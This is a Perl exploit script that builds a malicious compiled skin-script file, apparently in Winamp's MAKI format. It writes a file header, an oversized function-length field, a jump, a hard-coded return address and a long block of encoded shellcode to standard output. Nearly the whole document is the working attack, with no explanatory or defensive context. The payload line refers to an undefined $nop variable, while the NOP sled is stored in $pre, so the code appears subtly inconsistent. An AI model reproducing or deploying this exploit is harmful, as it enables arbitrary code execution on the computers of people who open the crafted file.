#!/usr/bin/perl

binmode STDOUT;

$| = 1;

$length = "\xFF\xFF";
$pre="\x90"x16756;
$jmp = "\x90\x90\xEB\x04";
$popaddr = "\x7f\x3b\x37\x7c";
$shellcode = 
"\x89\xe1\xdb\xc9\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x6b\x4c\x6d\x38\x4e\x62\x65\x50\x67\x70" .
"\x53\x30\x63\x50\x6e\x69\x39\x75\x55\x61\x6b\x70\x72\x44" .
"\x4c\x4b\x52\x70\x74\x70\x6c\x4b\x66\x32\x46\x6c\x6c\x4b" .
"\x73\x62\x74\x54\x4e\x6b\x70\x72\x34\x68\x74\x4f\x6d\x67" .
"\x71\x5a\x75\x76\x50\x31\x59\x6f\x6e\x4c\x45\x6c\x73\x51" .
"\x31\x6c\x57\x72\x44\x6c\x45\x70\x4b\x71\x78\x4f\x64\x4d" .
"\x37\x71\x69\x57\x58\x62\x78\x72\x33\x62\x36\x37\x6e\x6b" .
"\x50\x52\x74\x50\x6e\x6b\x51\x5a\x67\x4c\x6c\x4b\x32\x6c" .
"\x77\x61\x32\x58\x6b\x53\x37\x38\x35\x51\x68\x51\x46\x31" .
"\x6e\x6b\x56\x39\x71\x30\x47\x71\x79\x43\x4e\x6b\x50\x49" .
"\x66\x78\x5a\x43\x55\x6a\x63\x79\x4c\x4b\x77\x44\x6e\x6b" .
"\x37\x71\x6e\x36\x35\x61\x69\x6f\x6c\x6c\x6f\x31\x6a\x6f" .
"\x76\x6d\x53\x31\x5a\x67\x77\x48\x59\x70\x63\x45\x4a\x56" .
"\x75\x53\x53\x4d\x6b\x48\x37\x4b\x51\x6d\x36\x44\x33\x45" .
"\x49\x74\x50\x58\x6e\x6b\x32\x78\x61\x34\x35\x51\x6a\x73" .
"\x30\x66\x6e\x6b\x66\x6c\x30\x4b\x4e\x6b\x43\x68\x35\x4c" .
"\x67\x71\x4b\x63\x4e\x6b\x47\x74\x6c\x4b\x63\x31\x6a\x70" .
"\x4b\x39\x51\x54\x66\x44\x45\x74\x61\x4b\x43\x6b\x75\x31" .
"\x33\x69\x62\x7a\x30\x51\x79\x6f\x4b\x50\x33\x6f\x61\x4f" .
"\x43\x6a\x6c\x4b\x45\x42\x48\x6b\x6e\x6d\x31\x4d\x62\x48" .
"\x74\x73\x47\x42\x45\x50\x47\x70\x75\x38\x62\x57\x52\x53" .
"\x55\x62\x33\x6f\x30\x54\x75\x38\x32\x6c\x63\x47\x64\x66" .
"\x46\x67\x69\x6f\x4e\x35\x58\x38\x6c\x50\x65\x51\x77\x70" .
"\x67\x70\x35\x79\x4a\x64\x76\x34\x70\x50\x75\x38\x74\x69" .
"\x6b\x30\x52\x4b\x75\x50\x79\x6f\x4b\x65\x66\x30\x52\x70" .
"\x32\x70\x70\x50\x37\x30\x32\x70\x77\x30\x56\x30\x51\x78" .
"\x4a\x4a\x76\x6f\x4b\x6f\x6b\x50\x49\x6f\x69\x45\x6f\x67" .
"\x33\x5a\x33\x35\x63\x58\x51\x6f\x47\x70\x57\x70\x67\x71" .
"\x30\x68\x33\x32\x43\x30\x47\x56\x4c\x54\x4d\x59\x49\x76" .
"\x31\x7a\x46\x70\x46\x36\x76\x37\x52\x48\x5a\x39\x4e\x45" .
"\x61\x64\x63\x51\x6b\x4f\x6e\x35\x6e\x65\x6b\x70\x52\x54" .
"\x46\x6c\x6b\x4f\x42\x6e\x67\x78\x61\x65\x68\x6c\x50\x68" .
"\x58\x70\x6e\x55\x69\x32\x76\x36\x69\x6f\x4a\x75\x32\x48" .
"\x42\x43\x70\x6d\x53\x54\x65\x50\x6e\x69\x79\x73\x76\x37" .
"\x56\x37\x42\x77\x50\x31\x4b\x46\x33\x5a\x34\x52\x76\x39" .
"\x61\x46\x79\x72\x39\x6d\x65\x36\x5a\x67\x61\x54\x36\x44" .
"\x57\x4c\x36\x61\x77\x71\x6c\x4d\x77\x34\x75\x74\x76\x70" .
"\x38\x46\x63\x30\x30\x44\x43\x64\x32\x70\x61\x46\x73\x66" .
"\x53\x66\x32\x66\x36\x36\x62\x6e\x31\x46\x73\x66\x31\x43" .
"\x61\x46\x45\x38\x31\x69\x5a\x6c\x65\x6f\x6f\x76\x69\x6f" .
"\x59\x45\x6f\x79\x6d\x30\x42\x6e\x43\x66\x32\x66\x49\x6f" .
"\x50\x30\x63\x58\x44\x48\x6f\x77\x67\x6d\x75\x30\x4b\x4f" .
"\x58\x55\x6d\x6b\x38\x70\x4e\x55\x69\x32\x56\x36\x53\x58" .
"\x69\x36\x6e\x75\x4f\x4d\x4f\x6d\x6b\x4f\x59\x45\x75\x6c" .
"\x76\x66\x63\x4c\x65\x5a\x6b\x30\x39\x6b\x69\x70\x73\x45" .
"\x45\x55\x4f\x4b\x53\x77\x46\x73\x63\x42\x72\x4f\x51\x7a" .
"\x57\x70\x61\x43\x6b\x4f\x38\x55\x41\x41";

$function_name = $nop . $jmp . $popaddr . $shellcode;
my $maki =
"\x46\x47" .                              # Magic
"\x03\x04" .                              # Version
"\x17\x00\x00\x00" .                      # ???
"\x01\x00\x00\x00" .                      # Types count
"\x71\x49\x65\x51\x87\x0D\x51\x4A" .      # Types
"\x91\xE3\xA6\xB5\x32\x35\xF3\xE7" .

"\x01\x00\x00\x00".                       # Function count
"\x01\x01" .                              # Function 1
"\x00\x00" .                              # Dummy

$length .                                 # Length
$function_name;

print $maki;
